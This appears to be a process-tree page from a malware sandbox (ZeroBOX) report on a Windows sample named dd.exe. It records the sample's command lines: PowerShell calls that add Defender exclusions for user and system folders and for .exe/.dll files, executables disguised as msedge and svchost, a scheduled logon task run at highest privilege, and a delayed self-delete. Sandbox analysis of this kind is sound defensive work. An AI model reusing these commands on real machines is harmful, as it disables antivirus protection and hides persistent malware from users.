| ZeroBOX

dd.exe "C:\Users\test22\AppData\Local\Temp\dd.exe"
1468
- cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  3024
  - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    2876
  - powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3056
- cmd.exe cmd /c start C:\Users\test22\AppData\Local\Temp\msedge.exe
  1824
  - msedge.exe C:\Users\test22\AppData\Local\Temp\msedge.exe
    492
    - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      1108
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        2208
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2384
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
        2844
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Local\Temp\msedge.exe"
      2728
      - svchost64.exe C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Local\Temp\msedge.exe"
        2620
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msedge" /tr '"C:\Users\test22\AppData\Roaming\msedge.exe"' & exit
        808
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msedge" /tr '"C:\Users\test22\AppData\Roaming\msedge.exe"'
        2660
        
        msedge.exe "C:\Users\test22\AppData\Roaming\msedge.exe"
        2560
        
        cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        2052
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        2040
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost64.exe"
        1856
        
        choice.exe choice /C Y /N /D Y /T 3
        2248
- cmd.exe cmd /c start C:\Users\test22\AppData\Local\Temp\msedge_web.exe
  2236
  - msedge_web.exe C:\Users\test22\AppData\Local\Temp\msedge_web.exe
    3028
    - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2260
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        1048
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        112
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
        1500
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\msedge_web.exe"
      1572
      - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\msedge_web.exe"
        2760
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msedge_web" /tr '"C:\Users\test22\AppData\Roaming\msedge_web.exe"' & exit
        2544
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msedge_web" /tr '"C:\Users\test22\AppData\Roaming\msedge_web.exe"'
        3052
        
        msedge_web.exe "C:\Users\test22\AppData\Roaming\msedge_web.exe"
        1888
        
        cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        1480
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        1052
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
        736
        
        choice.exe choice /C Y /N /D Y /T 3
        2592

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents